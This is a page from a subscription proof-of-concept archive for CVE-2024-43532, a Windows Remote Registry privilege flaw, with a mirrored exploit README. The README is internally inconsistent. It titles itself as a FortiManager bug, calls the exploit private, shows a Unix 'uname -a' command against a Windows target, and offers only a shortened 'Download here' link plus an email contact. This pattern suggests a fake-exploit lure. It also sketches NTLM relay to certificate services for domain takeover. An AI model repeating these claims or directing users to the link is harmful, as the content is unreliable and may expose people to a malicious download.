Goal Reached Thanks to every supporter — we hit 100%!

Goal: 1000 CNY · Raised: 1310 CNY

100%

CVE-2024-43532 PoC — Remote Registry Service Elevation of Privilege Vulnerability

Source
Associated Vulnerability
Title:Remote Registry Service Elevation of Privilege Vulnerability (CVE-2024-43532)
Description:Remote Registry Service Elevation of Privilege Vulnerability
Readme
# CVE-2024-43532: FortiManager Missing Authentication
## Overview
The exploitation of CVE-2024-43532 empowers attackers to capture and redirect a client's NTLM authentication data to Active Directory Certificate Services (ADCS). This facilitates their ability to request a user certificate for future authentication to the domain. As a result, they can create new privileged accounts at the domain level, which may lead to long-term control over the system.
## [Download here](https://bit.ly/4fhYVxA)
## Details
+ **CVE ID**: CVE-2024-43532
+ **Published**: 2024-10-08
+ **Impact**: Confidentiality
+ **Exploit Availability**: Not public, only private.
+ **CVSS**: 8.8
## Vulnerability Description
The problem is related to the BaseBindToMachine function in advapi32.dll. In some cases, the function uses the insecure authentication level RPC_C_AUTHN_LEVEL_CONNECT, which allows attackers to perform a Machine-in-the-Middle attack. If the underlying SMB transport is unavailable, the client switches to TCP/IP and other protocols, which opens the door to interception of data and execution of an attack.

## Affected Versions
Windows 10/11, Windows Server 2008-2022

## Running
To run exploit you need Python 3.9. Execute:

python exploit.py -h 10.10.10.10 -c 'uname -a'
## Contact
For inquiries, please contact: GordonPoool@hotmail.com
File Snapshot

Log in to view the POC file snapshot cached by Shenlong Bot

Log in to view
Remarks
    1. It is advised to access via the original source first.
    2. Local POC snapshots are reserved for subscribers — if the original source is unavailable, the local mirror is part of the paid plan.
    3. Mirroring, verifying, and maintaining this POC archive takes ongoing effort, so local snapshots are a paid feature. Your subscription keeps the archive online — thank you for the support. View subscription plans →